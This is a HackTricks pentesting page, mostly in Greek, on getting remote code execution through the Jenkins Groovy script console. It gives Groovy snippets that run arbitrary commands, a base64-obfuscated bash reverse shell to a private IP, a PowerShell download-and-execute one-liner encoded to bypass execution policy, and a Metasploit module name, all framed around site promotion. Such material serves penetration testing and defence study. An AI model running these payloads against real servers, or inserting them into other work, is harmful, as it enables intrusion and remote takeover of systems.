Jenkins RCE with Groovy Script

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Jenkins RCE with Groovy Script

Αυτό είναι λιγότερο θορυβώδες από το να δημιουργήσεις ένα νέο έργο στο Jenkins

Πήγαινε στο path_jenkins/script
Μέσα στο πλαίσιο κειμένου εισάγεις το σενάριο

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

Μπορείτε να εκτελέσετε μια εντολή χρησιμοποιώντας: cmd.exe /c dir

Στο linux μπορείτε να κάνετε: "ls /".execute().text

Αν χρειαστεί να χρησιμοποιήσετε εισαγωγικά και μονά εισαγωγικά μέσα στο κείμενο. Μπορείτε να χρησιμοποιήσετε """PAYLOAD""" (τριπλά διπλά εισαγωγικά) για να εκτελέσετε το payload.

Ένα άλλο χρήσιμο groovy script είναι (αντικαταστήστε [INSERT COMMAND]):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Αντίστροφη θήκη σε linux

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Reverse shell in windows

Μπορείτε να προετοιμάσετε έναν HTTP server με ένα PS reverse shell και να χρησιμοποιήσετε το Jeking για να το κατεβάσετε και να το εκτελέσετε:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Script

Μπορείτε να αυτοματοποιήσετε αυτή τη διαδικασία με αυτό το σενάριο.

Μπορείτε να χρησιμοποιήσετε το MSF για να αποκτήσετε ένα reverse shell:

msf> use exploit/multi/http/jenkins_script_console

Υποστηρίξτε το HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousBasic Jenkins Information NextJenkins RCE Creating/Modifying Project

Last updated 3 days ago